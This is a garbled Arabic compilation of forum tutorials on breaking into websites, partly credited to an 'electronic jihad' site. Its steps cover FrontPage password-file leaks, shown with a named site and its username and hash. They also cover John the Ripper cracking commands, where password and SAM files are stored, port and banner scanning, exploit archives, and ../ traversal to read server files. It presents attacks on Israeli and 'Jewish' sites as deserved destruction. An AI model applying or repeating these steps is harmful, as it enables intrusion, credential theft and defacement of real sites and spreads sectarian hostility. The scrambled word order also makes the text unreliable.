) الدوس ) وتفتح واحد بمجلد اليوزر مع المشفر الملف وتحط تنزلهالتالي السطر وتكتب جوهن لمجلد  john -i PASSWORD.FILE وتروح

الباسس لك يطلع استناه  وعاد

النظام هي واللي الثالثة للفقرة نروح  طيب

لينكس هو النظام ماشفنا  زي

كثير إصدارت منه وفيه ماندريك و هات ريد فيه لينكسايش؟ لكناكثر  وثغرات

مشكلتين تواجهك راح هنا  لكن

ول وتشغيل ابدا من تطلعه تقدر النظام معرفة شيء telnet اولوإصدارته نوعه فوق النظام لك يطلع الموقع عنوان  واكتب

لينكساصال عندك يكون الزم الثانية  المشكلة

ال بلغة ثغراته عاللينكسفقط c علشان إال ماتشتغل  وهذه

================ 

http://neworder.box.sk/  فوق ) مثال تكتب جدا مفيد الموقع هذا) عاليمين اللي اي apache او IIS بالمربع او واصدارته منتدى او

ثغراته لك ويطلع  برنامج

http://www.ussrback.com/  ل تروح جدا جدا خطير هذا الموقعEXPLOITS جميع ثغرات هنا اختيار اول وتختار عاليسار اللي

.. من ومنوعة الخ و و و ويندوز لينكسو من يوني perl و c االنظمة و.كود

،،،انتهى

المواقع " اختراق كيفية عن ومبسطة يسيرة " نبذه

> تن كويت منتديات من >منقول :الكاتب<

معي  ركزللموقع . بأتجاه عليك المبتدئين بالذات الجميع يحير سؤال هذا

اختراقه  المراداهمها عوامل عدة حيث من كامال الموقع دراسة عليك يجب  حيث

الى ) -1 السيرفر وينقسم الموقع في والمستخدم السيرفر نظام نوعين

هو ( - االول النوع اس ( IIS ا اي  ) اي

الثاني ( - النوع  ) اباشي ( apachc ب

ال ) -2 ام الموقع في بحث محرك وجود  مالحظة

الخمول ) -3 ووقت الموقع لزوار الذروه وقت  معرفة

للموقع ) -4 األيبي  معرفة

لتنفيذ جدا مطلوبه كعوامل المتخذه العوامل اهم هذه تقريباتاخذ وهذه  العمليه

بالساهل مايجي شي كل ان حيث  وقت

السيرفر وذكرنا تقريبا IIS سبق امره وهذا المواقع لبعض والداعمان حيث  سهل

الهواه من هم الطريقه هذه يستعمل من  اغلب

تكون بأن مرتبط ايضا واختراقها سهله تقريبا ثغرات ان حيثلديك التي  الثغرات

طااازه و  جديده

وسوف المساعده البرامج ببعض ثم بالله باألستعانه صبر وشويةنجاحاتك  تححق

الله  . بأذنالبحث apachc سيرفر على يعمل ال وغالبا جدا قوي السيرفر وهذا

ثغراته  عن

له . من اال عملها يستطيع ال امور عدة يتطلب ألنه المحترفون سوى خبره

البرمجه بعضلغات ليونكسويعرف . بنظام،،،انتهى

" )> ج& للمبتدئين )>س المواقع اختراق " في

> مصر ابن منتدى من >منقول> العربي: القناص >الكاتب

العربي*: القناص أخي عليكم السالم سالمزيف*: العربي القناص أهلين D: ج

الهاكنج*: , في أسألة شوية أسألك عايز كنت أنا أحم أحم .سولعب*: , , األجهزة اختراق عن ماتكون بسياريت حبيبي تفضل ج

هذا !! العيال

كثير*: , تطوت أنا ال ال  ستفضل*: أوكى  ج

توضيح: , 2س يمكنك هل بيج الفرونت ثغرات عن كثيرا سمعت لقد الثغرة هذه استخدام . طريقة

االثنين: 2ج عيوني ومن حبي بالتأكيد :Dالتشغيل أنظمة في موجودة بتكون بيج الفرونت ثغرات & NT طبعا

Unix الـ سيرفراتها يدعم معرفة , FrontPage التي من وبتمكنكالموقع تبع األدمين سر  كلمة

التالية الملفات في موجودة بتكون هذه السر :وكلماتAdministrator.pwd

Administrators.pwdAuthors.pwdUsers.pwd

المجلد في عادة بتكون vti_pvt_ التي

الملف هذه مثل http://www.tradesystemlab.com/_vti_pvt/service.pwd :مثال

الملف فتح تقريبا service.pwd وبعد هكذا بداخله مكتوب :هتالقي# -FrontPage-

tradesys:FpNTpIDWSk872المستخدم واسم المشفرة السر كلمة  وهذه

كأدمين: , 3س الموقع على أدخل كيف ولكن ممتاز واااااو أووووه ؟؟ الكلمات S: بهذه

برنامج: مثل بي تي اف برنامج استخدام يمكنك ضع , WS_FTP ج أوكلمة www بدل الموقع عنوان هذا ftp في ftp.ebnmasr.com :مثل

اسم , الموقع منك وسيطلب العنوان شريط في بموضعه وقمللموقع المرور وكلمة  المستخدم

وكلمة: 4س المستخدم باسم ليشمايدخل ولكن حبيبي مشكور هذه )N( ؟؟ tradesys:FpNTpIDWSk872 : السر

طريق: !! , 4ج عن تشفيرها فك يمكنك مشفرة ألنها بساطه بكل برنامج مثل من , John The Ripper برنامج نزلهhttp://www.openwall.com/john:هنا

تشرحهولي: , , 5س ممكن البرنامج هذا أستخدم ماأعرف لكني أها ؟؟ سمحت القناصلو العزيز أخي

الخدمة: !! , 5ج في أنا ياولد مني :   التستأذن أول, انت شوف مجلدين , فيه هيكون ضغطه وتفك البرنامج الي , doc & run :ماتنزل

مجلد هو ماتفتح: , run يهمنا وبدل نفسك على تسهل عشان شوفالبعضما وكمان وهالمشاكل البرنامج مجلد على الدوسوتدخل

هاألشياء يعمل : p: بيعرفعن جهازك في في command.com :ابحث والصقه بنسخه وقم

؟؟ , run مجلد أوكىهذه السر كلمة ملف tradesys:FpNTpIDWSk872 :وجيب في وحطها

txt باسم passwd مجلد في وضعه بفتح , run مثال تقم , john.exe والالتالية command.com افتح األوامر فيه :واكتب

john -single passwd.txt << التي السرية الكلمات عن لك ليبحثالمستخدم السم مطابقه تكون

john -i:Digits passwd.txt << فقط األرقام عن لك ليبحثjohn -i:Alpha passwd.txt << الصغيرة الحروف عن لك ليبحث

john -i:all passwd.txt << االحتماالت جميع عن لك وأنا ( , ليبحثمعي , الفك عملية بتطول كده عشان األمر هذا أستخدم طول على

:D (المشفرة السر كلمة ستجد الكلمة فك من البرنامج ينتهي وبعدما

هذا بالملف john.pot :والمفكوكه

؟؟: , , 6س تشفيرها هيفك أنه متأكد كثير طول البرنامج يااااااهأخذ: , 6ج لو حتى النهاية في تشفيرها يفك الزم أيوووووه

االحتماالت ;( , جميع بيجرب ألنه .أسبوع

لوحة من زر أي على بالضغط البرنامج حالة تعرف وممكن المفاتيح

السر: , 7س كلمة انفكت خالص لله الحمد )Y( , اسم وين لكن؟؟ المستخدم

هذه: 7ج السر كلمة في : tradesys:FpNTpIDWSk872 , اسم هيكونعالمة ( tradesys :المستخدم قبل بتكون الي الكلمة ) : يعني

؟؟: , 8س الموقع من هالثغرة كيفجبت تقولي ممكن قنااااااص :$جبتها: ,,, ;( , 8ج بصراحة أنا الخجالن هالوجه وليه هههههههههه

عليه , تعمل ممكن موقع عنك كان لو انت ولكن العشوائي بالبحثعمران برنامج فحصمثل ببرنامج لدي ( سكان عشان ) D: المفضل

بالموقع الموجودة الثغرات  تطلع

واحد: , 9س هأسأل ده فات الي عالجواب سؤالين عندي أنا طيب ؟؟,   األول هذه العشوائي البحث طريقة ايه

محرك: , : في معينة ثغرة عن تبحث انك الطريقة هذه أحم أحم جالـ يستخدم الثغرة spiders بحث فيها كثيييرة مواقع تالقي عشان

لك , , أقولك لن لكن السبايدرز بتستخدم كثيرة مواقع طبعا في هذهالموقع , هذا اال منها واحدة أي موقع walla.co.il :على هذا وطبعا

اسرائيلية , مواقع تكون النتائج معظم عشان . ); اسرائيلي

زين: , , 10س مافهمتك ؟؟ معينه ثغرة عن تبحث يعني كيف ممممم !!

الفرونت: 10ج ثغرات عن للبحث اال هالمواقع ماأستخدم والله أنا سابقا :$ , , ذكرها تم التي الثغرة عن تبحث عايز مثال انت يعني بيج

هذه , , واحدة كلمة غير كاتب مانت ؟؟ ايه  service.pwd :هتكتب   

كيفية: , , 11س عن كمان أسألك عايز كنت حبيبي مشكور أهاااااا الثغرات على السكان برامج  عمل

الـ: 11ج أو الثغرات من كبيرة مجموعة فيها بتكون هذه البرامج EXPLOITES , , وتطلعلك الموقع على ثغرة ثغرة تجرب وبتبدأ

الـ,   النتائج منه تجيب عشان رهيييب موقع وفي EXPLOITES , هو . /http://www.ussrback.com :هذا

،،،انتهى

الثغرات CgiScaner برنامج " عن " للبحث

>منقول<> هاجر: بو >الكاتب

الثغرات عن للبحث رائع برنامج  هنا

خروج 1رقم .المستخدمة 2رقم الكودات أظهار .

البحث 3رقم بدأ .للضحية 4رقم العنوان تضع .

الموقع فى الموجودة الثغرات لك يظهر وسوف البرنامج .وأترك

البرنامج ..وصلةhttp://mypage.ayna.com/vox99/cgiscan3.zip

،،،انتهى

المواقع " في المفتوحة المنافذ لمعرفة سكان سوبر برنامج " شرح

> نت شامل منتديات من >منقول> مشاريو: >الكاتب

المفتوحه ::: المنافذ عن بالبحث يقوم البرنامج هذا بالبرنامج تعريفجهاز  في

يصيد ,,, وال ضعيف الباحث فيها يكون البرامج بعض الن  الضحيه

السبسفن برنامج ذلك امثلة ومن مفتوح منفذ به بي اي ايان ,, رغم  جولد

هذا فنستخدم الباحثضعيف ان اال ممتازه اتصاله وقوة البرنامجكاداة  البرنامج

 ’’’’’ مساعده

التشغيل " أنظمة في الباسورد ملف وجود " اماكن

> الحلم منتدى من >منقول> هنتر: بالك >الكاتب

ليونكس نطم  في/etc/shadow 

ميكروسيستيمز صن نظم  في/etc/shadow 

ال نظم عامه BSDفي  بصفه/etc/master.passwd 

جرافيكس السيليكون نظم  ARIX المسمى SGI في/etc/shadow 

المسمى ام بي اي  AIX نظام/etc/security/shadow 

يونكس )) - )) ترو اكس يو اتشبي عامه يونكسبصفه 64نظم الريسك)) ونظم بالمنفريم االلفا (( (( ((64خاص وبعضمنتجات  

/etc/shadow 

)) تشفير تعتمد االصدارات هذه  )) القوي MD5 اغلب

عامه بصفه ويندوز  )) NT - XP - 2000 (( نظمبتشفير (( المفعل  )) LanMan الملف

/winnt/system32/config/sam )) بفتحه يسمح وال النظام من االقالع عند اال عادة مغلق الملف هذا

صالحيات لديك كان ولو حتى يعمل النظام طالما نسخه او )) االدمنيستريتور

)) االحتياطي  )) الملف/winnt/repair/sam or sam._ 

سيرفر )) - الويسلر واصدارات البروفيشينال اكسبي الويندوز فيسيرفر ((  ادفانسد

مجلد في الويندوز تجد  WINNT لنالعادي كالويندوز سيكون .Windows ولكن

،،،انتهى

" ) األول ) الجزء الموقع " اختراق

> اإللكتروني الجهاد موقع من >منقول

 : مقدمه

هذا كل مر لماذا اعرف وال الدرسالسابق منذ طويلة فترة مرتو .. الموضوع لصعوبة ربما الدرس هذا كتابة في ابدأ أن دون الوقت

و .. التشعب و الصعوبة لمجابهة الوقت حان قد ها لكن و تشعبه

الممتع الموضوع هذا عن بسيطة فكرة حتى لو و  .. تقديم

تعريف بساطه Telnet سأعيد اكثر بطريقه لكن و جديد  .. منTelnet الجهاز ،و جهازين بين وصله إنشاء في يستخدم برنامج هو

المنفذ رقم و المستهدف الجهاز عنوان يستخدم الذي Port المتصل ) آخر ) برنامج يشغل الخادم المستهدف الجهاز ،و عليه االتصال سيتم

)Daemon( واالستقبال اإلرسال عمليه تتم و المنفذ هذا على يستمعالبروتوكوالت أحد  . باستخدام

فرنسا : في رجل هناك نفترضأن العملية حياتنا من تشبيه ) ( ) ( ) أنت) و وصله معه حوار إقامة تريد المتصل أنت و المستهدف

اتصال .. وسيله استخدام من لك فالبد مصر لنفرض )Telnet( في وأذنه على يضعه أن للرجل البد الذي الهاتف لكي )Daemon( أنها

فالبد .. .. إذن العربية يتحدث ال الرجل هذا أن أيضا لنفرض و يسمعك ) تتحدث ) حتى المستخدم البروتوكول الفرنسية استخدام من لك

) بحريه) واالستقبال اإلرسال . 

أن نستنتج سبق ( .. Telnet مما البد ) انه و الهاتف مثل وصله مجرد هوفي ننجح حتى االتصال في المستخدم البروتوكول معرفة من لنا

من . البد أنه أيضا نعرف أن من لنا البد انه كما االستقبال و اإلرسالعليه Daemon برنامج االتصال المراد المنفذ على  . يتسمع

 FTP Client ك Telnet استخدامنقل بروتوكول استخدامنا حاله في عليه االتصال سيتم الذي المنفذسيكون FileTransfer Protocol الملفات الغالب 21في .. 

؟ إذن الصعوبة  أيننستخدم لكي أننا في تكمن علينا FTP Client ك Telnet الصعوبة يجب

ببروتوكول كبير بقدر  !! FTP اإللمامالتعامل كيفية إلظهار عرضبعضاألمثلة من يمنعني لن هذا لكن و

البروتوكول هذا  .. مع

االتصال  بدءبتشغيل -1 على Telnet قم شبك 21بالمنفذ ftp.zdnet.com و  

لك سيظهر ما هذا  و

Sources Code - شفرة 

220 l19-sj-zdnet.zdnet.com NcFTPd Server )licensed copy( ready. 

يسمي السابق السطر FTP Daemon الخاصبال Banner وموقع في الذي zdnet المستخدم الموقع باختالف تختلف هي و

نجاح . على يدل البداية في الموجود الرقم و عليه التشبيك سيتمثابت رقم هو و  . االتصال

المستخدم -2 اسم باستخدام الولوج هي التالية Username الخطوةالسر كلمة أن .. Password و المستخدم zdnet بما Anonymous تدعم

كالتالي للنظام الولوج في استخدامه  :سيتم ستكتب

Sources Code - شفرة 

user anonymous 

بالتالي الخادم سيستجيب  و

Sources Code - شفرة 

331 Guest login ok, send your complete e-mail address as password. 

التالي أنت تكتب  ثم

Sources Code - شفرة 

pass @zorro 

بالمستخدم الولوج عند بالطبع عنوان Anonymous و بإعطاء تقومبريدك .. إعطاء ترد لم إذا و السر ككلمة الخاصبك اإللكتروني البريد

على ) يحتوي أي البريد شكل يأخذ شئ أي تكتب أن فيمكنك @ (الرمز

بالتالي الخادم سيستجيب  و

Sources Code - شفرة 

230-You are user #552 of 2000 simultaneous users allowed. 230- 

230 Logged in anonymously. 

الرقم .. في إال آلخر موقع تختلفمن قد اإلستجابه تلك بالطبع وسطر كل بداية  .. في

بنجاح الخادم إلى بالولوج قمت قد اآلن  . أنت

إلرسال وصله إنشاء يجب للنظام الولوج عمليه تمت أن بعد.. ) ذاتها ) الملفات أو الموجودة بالملفات قائمه البيانات واستقبال

!! إنشاء هو قليل منذ فعلناه قد ما ؟ قليل منذ نفعله كنا الذي ما إذنعلى النظام استجابة استقبال و للنظام األوامر إلرسال وصله

 . األوامرطريقتين ،هناك الوصلة تلك ننشئ لكي  و

) رقم : ) أنت الزبون يرسل بان الوصلة الطريقة هذه تنشئ IP األوليفي استخدامه الخادم يستطيع الذي المفتوح المنفذ و به الخاص

البيانات  . إرسالهذا و جهازك على المنافذ أحد فتح منك تتطلب الطريقة تلك لكن و

تلك .. نستخدم لن لذلك و المنفذ هذا خاصلفتح برنامج سيتطلب . الطريقة

األمر : الزبون يرسل بان الوصلة الطريقة هذه تنشئ  PASV الثانية

Sources Code - شفرة 

PASV 

برقم الخادم سيرد الخادم ) IP و على المفتوح المنفذ و به الخاص ) عليه( ) االتصال أنت الزبون يستطيع الذي  .. بالطبع

 مثال

Sources Code - شفرة 

227 Entering Passive Mode )207,189,69,61,12,41( 

كالتالي األقواستفسيره بين الموجود الطويل الرقم  .. و ) ال ) هو اليسار من مجموعات أربع هذه IP أول في و بالخادم الخاص

يكون رقم .. 207,189,69,61الحالة فيمثالن التاليان الرقمان أما كالتالي حسابه يتم و  المنفذ

12 × 256 + 41 = 3113 

فتح هي اتباعها الزبون على يجب التي التالية فالخطوة لذلك والمنفذ على الخادم مع جديده هذا .. 3113وصله بمثل تقوم ولكي

نافذة فتح عليك يتوجب على Telnet األمر تشبك و جديدهftp.zdnet.com 3113بالمنفذ .. 

و األولى النافذة من سترسله األوامر أحد ترسل أن تريد عندما إذنالبيانات بها ستظهر الثانية  .. النافذة

 مثالاألمر ترسل ) LIST عندما ) في الدليل لعرضمحتويات يستخدم

األولى  النافذة

Sources Code - شفرة 

LIST 

أيضا األولى النافذة في بالتالي الخادم  سيستجيب

Sources Code - شفرة 

125 Data connection already open; Transfer starting. 

االتصال غلق سيتم ثم الثانية النافذة في الدليل محتويات ستظهر والدليل عرضمحتويات إتمام بمجرد الثانية النافذة  . في

استقبال أو ما دليل عرضمحتويات أمر ترسل أن أردت كلما هكذا وبأمر تبدأ أن يجب ، ما ملف إرسال جديدا .. PASV أو اتصاال تنشئ ثم

السابقة الخطوات باتباع المنفذ رقم حساب  . بعد

نفسي .. امنع أن استطع لم لكنني و تماديت قد أنني أظن و هنا إلى) إلي ) بالنسبة ممتع الممتع الموضوع بهذا مشاركتكم  . من

هامة  مالحظاتاستخدم .. - أن الهراء هذا كل من بدال أستطيع أال اآلن تتساءل لربما

مثل جاهز أن!! CuteFTP برنامج يضرك لن لكن و تستطيع بالطبع ؟تعلم بعد ربما و تستخدمه الذي البروتوكول عن شيئا تعلم

الخاص برنامجك تصنع أن تستطيع  البروتوكولاسأل - ثم تماما الفكرة تستوعب حتى مرتين و الدرسمره اقرأ

شئت  فيماالتالية - المواقع بزيارة قم الموضوع هذا عن اكثر  لتعلم

http://www.vbip.com/winsock/winsock_ftp_01.asp ) بشده به  )ينصح

http://www.vbip.com/winsock/winsock_ftp_ref_01.htm ) به ينصح )بشده

http://www.cis.ohio-state.edu/htbin/rfc/rfc0959.html ) اراد لمنالبروتوكول في .)التعمق

،،،انتهى

" ) الثاني ) الجزء المواقع " اختراق

الجهاد < موقع من >منقول> الكندور: >الكاتب

 : اإلختراق~~~~~~~~~ 

 . المقدمة -؟ - الموقع حول معلومات أجمع  كيف

؟ - الضعف نقاط كشف يتم  كيف؟ - المكتشفه الضعف نقاط إستغالل يمكن  كيف

المرور - كلمة ملف  ؟ password file ماهو؟ - الملف هذا يفيدني  بماذا

الباسورد - ملف خالل من السر كلمة معرفة يمكن password كيفfile ؟ 

الملف - كان إذا بين كان )encryption مشفر( ماالفرق مضلل( وإذاshadowed( ؟ 

؟ - كسره يتم كيف ، مشفر المرور كلمة ملف كان لو  وماذا؟ - أعمل ان علي ماذا ، مضلل المرور كلمة ملف كان  ولو

 -: المقدمة~~~~~~~~~ 

أنا ! فقط موقع يخترق أن أراد وليسلمن للباحثين المستند هذا أعدإني تتوقع ال ، عنه أتحدث ما كل لفهم الالزمه الخبره لديك أن أعتبر

برنامج نزل لك هذا ) Void Eye مثل ( بقول في لك وحط غيره أوهذا المقزز العمل ، مواقع إخترق لك وقول بالصور شرح المستند

أبدا له نتطرق  لن

؟ - موقع حول معلومات أجمع  كيف~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

تستخدم أنصحك ، سكان بورت هي تصلحها خطوه nmap أولما إذا هذا عنها تبحث أن اإلطالق،يمكن على واألقواء المشهوره

الموقع في  www.inscure.org/nmapلقيتها نظام على تعمل وهيبـ انصحك ويندوز على يعمل برنامج أردت إذا ، ، SuperScan ليونكس

التي المواقع آالف تجد سوف ، اإلنترنت في عنها البحث عليكنصوص تستخدم أن الممكن ومن ، لتنزيل البحث Perl تقدمها لعمليه

لغه ، Perl بعد الهاكر جميع لدى محبوبه اللغه  C أصبحتعلى تجربه نصلح مثال ، النتائج على الحصول بعد

رقم ) /http://www.7lem.com الموقع وضع تطلب البحث برامج بعضإستخدم عندها الدوماين والتقبل ، للموقع بي لتعرف ping اآلي

بي اآلي  )رقمالبورتات ) ، النتائج -514 - 513 - 143 - 110 - 37 - 25 - 23 - 22 - 21تأتي

نزع( 587 بعمليه نقوم ، هنا لها نهتم لن لكن أخرى منافذ ويوجد للمنافذ  ...التواقيع

للمنافذ؟ التواقيع نزع عمليه  ماهيبهذا اإلتصال عند ، تطبيق قبل من فتح المنفذ أن المعروف من

بالبورت إتصلت لو مثال ، اليك رد إرجاع يتم فسوف وهو 23المنفذ وموقع ،  /http://www.7lem.comلتلنت ويتضح ، تلنت خدمه به توجد

اتلنت بخدمه ،اإلتصال المنافذ مسح عمليه من  هذاtelnet http://www.7lem.com/ 

في التالي األمر تنفيذ FreeBSD و SunOS و Linux و Windows يتمأفضل QNXو ولكن ، لينكس Linux بنفسالصيغه ألن وهو ، عنهابـ ... يختص ال المستند هذا أدوات من ماتحتاجه كل لذلك Linux يوفر

التلنت بورت على الحلم بسيرفر اإلتصال نتيجه تأتي ، أذكرها  لن

---------------------- SunOS 5.7 

: login ---------------------- 

نظام على يعمل السيرفر بأن ، SunOS 5.7 يتضح تنتزع أن عليك بقيوإصدارته التطبيق هو ما لتعرف المتبقيه البورتات من التواقيع

لها ) ( نقاطضعف عن ببحث تقوم وثم ، التلنت إستخدم لها المنصتهي التاليه الخطوه ، بها الخاصه اإلستثمار شيفرات على وتحصل

نذهب ، النظام هذا على يعمل الذي الويب ملقم هو ما تعرف أنليونكسونكتب تبع الترمينال  الى

nc http://www.7lem.com/ 80 

---------------------- . . . 

Apache/1.3.* Server . . 

---------------------- 

لحمايه وذلك الويب ملقم إصدار تضليل وتم النتيجه أختصرتبنفسك كشفه تستطيع أن اتمنى ،  ...الموقع

البورتين بأن بورت السكان عمليه من المعروف 25و 110من ، اإللكتروني البريد خدمة الموقع في أن على يدل هذا ، مفتوحين

لمعرفه يفيدك هذا فعله pop و smtp بالطبع ماعليك كل ، للموقعالتالي األمر كتابه  ) Linux في( هو

host 7lem.com 

النتائج  وأنتظر

تقنيه :- جو عائشفي ولست الدن بن تعيشمع كنت إذا مالحظهما ) علىحسب تفجيراإليميل هو فعله عليك ما كل معلومات

) الناس من كثير  يسمياهاتغيير :- تم أنه أو تلنت خدمه السيرفر في تجد لم إذا ثانيه مالحظه

تستخدم .... أن عليك ، الخ النظام قرصنه مثال طريق عن التوقيعqueso على تعمل وهي ، التشغيل نظام لكشف المفضله األداة

كتابه عليك إلستخدامها  ليونكس،queso http://www.7elm.com/ 

كتابه هو جهازك في األداة تثبيت بعد ماعليك مسافه queso كل وثمالبورت ورقم جميع 80والموقع في مفتوح الحال بطبيعه هو والذي

النظام... بأن الرد يأتيك  SunOS 5.7 المواقع

في الموجوده بالبريدات قائمة مثال أردت لو أو webmaster أو support ( مثال /http://www.condor.com موقع

info ...الـ ) الخ معرفه أدرت من DNS أو أو ، للموقع والثانوي األوليالتي الشركه هي وما عنه ومعلومات الليسجل الشخص هو

خدمه بإستخدام عليك ، الموقع ، whois تستظيف إستخدام تستطيعبيانات whois خدمه قواعد من معلومات طريق whois وتطلب عنأكتب whois أمر ، لينكس إذا man whois في ، المعلومات من لمزيد

برمجيات الى بالتوجه أنصحك أخرى بيئه أي أو ويندوز تستخدم كنتالموقع في المتواجد آي جي  السي

http://www.psyon.org/tools/index.html التي آي جي السي برمجيات من مجموعه الصفحه هذه لك توفر

ويب موقع عن معلومات لطلب رياضيات هناك ، المهمه لك تسهلالموقع whois بإستخدام الى توجه حال كل على ، جدا مفيده وهي

التفاصيل من لمزيد  التاليhttp://www.google.com/search?q=whois&btnG=Google+Search 

؟ - الضعف نقاط كشف يتم  كيف~~~~~~~~~~~~~~~~~~~~~~~~~~ 

مثل برامج تستخدم هذه ShadowSecurityScaner أو void eye ال !! يستخدم ال محترف يكون يبغا واللي المحترفين ، فقط للمغفلين

، يخترق يبغا أنه لمجرد يخترق وال ، اإلختراق عمليات في برامج ، المحكم والتخطيط ، المتناهيه بالدقه تمتاز سيرفر إختراق عمليه ، مرتكبيها إكتشاف يصعب التي هي المحكمه السطو عمليات وكل

حاطه وين الله ومايدري برنامج يشغل اللي من كنت لو والله لكن ، شئ تخترق قدرت لو هذا ، عمرك طول تفلح ماراح إنك فصدقني

تصطاد فسوف البرامج هذه من بواحد اإلختراق وتم حدث فلوكالسمكه تماما  بسناره

بعد اال عنها يكشف وال كأسرار تعتبر والتي المفضله الضعف نقاطمثل الويب ملقم في التي هي طويله ، IIS أو Apache فتره وكذلك

سكربتات في الموجوده الضعف ، PHP و Perl و CGI نقاط التي أو

أو البيرل نصوص لتفسير المستخدم البرنامج في موجوده تكون قدالممكن من مثال لتسوق برنامج الموقع في كان وإذا ، آي جي السي

في شئ اي يعني ، به وجدت إذا هذا ضعف نقطه فيه تستغل أن .. برنامج كان أو آي جي سي أو بيرل سكربت كان سوى السيرفر

ضعف بنقطه مصاب الويب ملقم أو التشغيل نظام حتى أو تنفيديمن بداخله ما ويعرضكل لإلختراق السيرفر يعرض أن الممكن من

معي مره حادثه لكم سأختار ، المخترق الى  أسرار ، زورا  عداد

counter عرضموقع mp3 ونزلت الموقع مادخلت أول ، لحظه أي في لإلختراق مشهورحبيت Don't Tell Me أغنيه فيه تنزل االغنيه كانت اللي الوقت في

أتوقع كنت ما ، التحميل ينتهي أن الى وقت وأضيع الموقع أشوفالتلنت فتحت ، فيه نقاطضعف بالقي أني

مثل معروف بورت كم على دخلت 110و 21و 23و 25وشبكت ، الخ المنتدى إسم واخذت الموقع في توجهة Ikonboard v2.1.8b منتدى

ولكن ، المنتدى نقاطضعف عن بسرعه فيها وبحثت موقع كم الىلـ الضعف نقاط ، Ikonboard v2.1.7b وليس Ikonboard v2.1.8b كانت

السورستبع فتحت ، ثاني شئ على ندور ورحنا المنتدى تركناعن وبحثت ، pl و cgi الصفحه ، توصيت علبة ، ثاني سكريبت وجدنا

البحثعن نكمل ، تماما شئ ال ، لها نقاطضعف عن نبحثعند لألغنيه التحميل وصل وعندما وأخيرا ، كنت % 80السكريبتات سكريبت ضعففي لنقطه توصلت ، cgi قد الزوار لعداد خاص

الملف طلبت ، السيرفر ملففي عرضأي من etc/passwd تمكنككان والنظام مضلله كانت المف في المسجله المرور كلمة وطبعا

في FreeBSD هو ولكن الدليل نفس في تكون المرور كلمة يعنيوهوالملف ثاني ، master.passwdأو shadow ملف اآلن بالك التشغل

ستعرفه .. هذا كل الملف هذا ومافائده مضلله كلمة تعنيه بمافقط ... القراءة في إستمر قريبا

++++++++++++++++++++++++الثاني  الجزء

{ http://www.fbunet.de/cgibin/nph-%20%20%20%20%20.cgi } هذا CGI ، نكمل ال لنشر الجديده الحركات هي هذه ، تستغرب ال

 .... الموضوع

بو ولد عنتر عليهم وصلح بدمره والله يهودي موقع هذا قلت ماورد ، ولصق نسخ لها صلحت ، الضعف لنقطه رساله أرسلت ، شدادعن حسنه فكره وأخذ لديهم الجديده باألغاني وقائمه بالشكر علي

حكوماتهم اللي اإلرهاب فكره من بدل العرب وعن المسلمينعقولهم في  تزرعها

الموقع : مثال تم timduff.com لنأخذ وقد ، التدمير يستحق موقع هذامن القليل اال يحوي وال جديد من ولكن إرجاعه تم اآلن وهو ، ذلك

إثنتان تتجاوز ال  الصفحات

بأنه اإلنجليزيه الهاكرز منتديات أحد في الموقع هذا عن سمعتواعرف ألسجل للموقع فذهبت ، بالضبط هي ما أعلم ال خدمه يقدم

بريد الى معلومات إرسال طريق عن التسجيل كان ، ماهيكا ، تقريبا ساعتين بعد الرد وصلني ، معلومات ارسلت اإللكتروني

حش كله كالم اال أقراء كنت ما ، حشوسب كله يكون الرد أن كنتكلمة ذكري هو السبب لي تبين ، ليش ، i'm from saudi arabia وسب

، أحقد والثاني يوم وكل ايام ومضت ، الحقد هذا كل لماذا ولكنالويب لملقم ولقينا توفقنا أن اال ، عنصريته عشان وأكثر أكثر عليه

تقدر ، مرقوعه غير اآلن واال ، روسي موقعي ضعففي نقطه حقهكل منها تسحب وتقدر ، السيرفر في الموجوده الملفات تعرضكل

هذا إل آر اليو طريق عن ،  ماتريد

من /../../../../../../../../../../../../../../../../../ حتى أو وثم الموقع عنوانتعرض /../ ما عرفت هل ، فقط الموقع عنوان بعد تضع أن الممكن

االخيره هذه  ! لك

ما موقع نقاطضعفعلى لكشف األساسيه النقاط أضع سوف اآلن:- 

السيرفر -1 على الموجوده الخدمات كافه على  التعرفوأي -2 الويب ملقم وكذلك وإصدارته التشغيل نظام معرفهأو ، ممكن ذلك كان إذا بيرل نصوص مفسر مثل أخرى برمجيات

الخ ..... والشراء للبيع  برنامجالسكربتات -3 كل إللتقاط جلسه في ) Perl - Cgi ( عمل الموجوده

منها شئ وجد إذا هذا ،  الموقعنقطه -4 البورت في يكون أحيانا ألنه ، معها البورتات تحط والتنسى

صحيحا ليسهذا ، البورت% 100ضعف في ليست الضعف نقطه تعبير ) أقرب هذا للبورت إنصات مصلح اللي البرنامج في ، بعينه

 لها(في -5 عليها حصلت التي المعلومات من اإلستفاده يمكنك أخيرا

من ) مواقع المستند هذا آخر في يوجد نقاطضعف عن البحثعلى الحصول في تفيدك قد أرشيفات على تحتوي مواقع ظمنها

 الثغرات(

؟ - المكتشفه الضعف نقاط إستغالل يمكن  كيف~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

التي تلك هي يستخدمها أن مبتدي أي يستطيع والتي الثغرات أبسطإلختراق ذكره السابق المثال مثل ، المتصفح خالل من تنفذ

 /http://www.timduff.comالموقع

على ) إستثمار إسم نطلق سوف اآلن من اإلستثمار يكون ، آخر نوع ) شفره شكل على اإلستثمار يكون الثغره بها تستغل التي الطريقه

) ببرنامج) مكتوب كود sh بالعربي يسمى ما وهو ليونكس، فيوباإلنجليزي الغالف ملف shell برنامج تحت الشفره هذه وتكون

من sh.* باإلمتداد النوع وهذا ليونكس، بيئه تحت وتعمل

لتعدد ونظرا بالقوه ويحسسالمخترق المفضل هو اإلستثماراتلغه ليونكسفإن في كتابه shell األداوت تقابل فهي قويه اصبحت

ويندوز في دفعاتي  )bat( ملف

) بلغه ) مكتوب كود شفره وهو ثاني اإلستثمارات من نوع C ويوجدالترجمه عمليه أثناء أخطأ فيه تحدث ما غالبا النوع وهذا ، المشهوره

في خلفيه لديك تكون أن يجب لذلك المتاعب من كثير تواجه قد ، ليونكسوترجمته الى بالذهاب عليك النوع هذا ولترجمه ، سي لغه

المترجم  gcc بإستخدامgcc Exploit.c -o Exploit 

مهمه للمف ( مالحظه اإلمتداد يكون أن ، C.* وليس c.* يجب كان لو، ++ c حرف سي في كتب وكأنه اإلستثمار يترجم فسوف كبتل

المكتبات توفر من تأكد الثاني اإلستثمار )h.*( الشئ يتطلبها التيتشغيله  )قبل

تنفعك قد البرمجه في مستندات فهناك موقعي زياره  عليك

شفره أيضا وهو ينتشر وبداء اإلستثمارات من مؤخرا ظهر نوع يوجدبلغه مكتوبه من Perl ولكن النوع هذا تشغيل يتم أن الممكن ومن

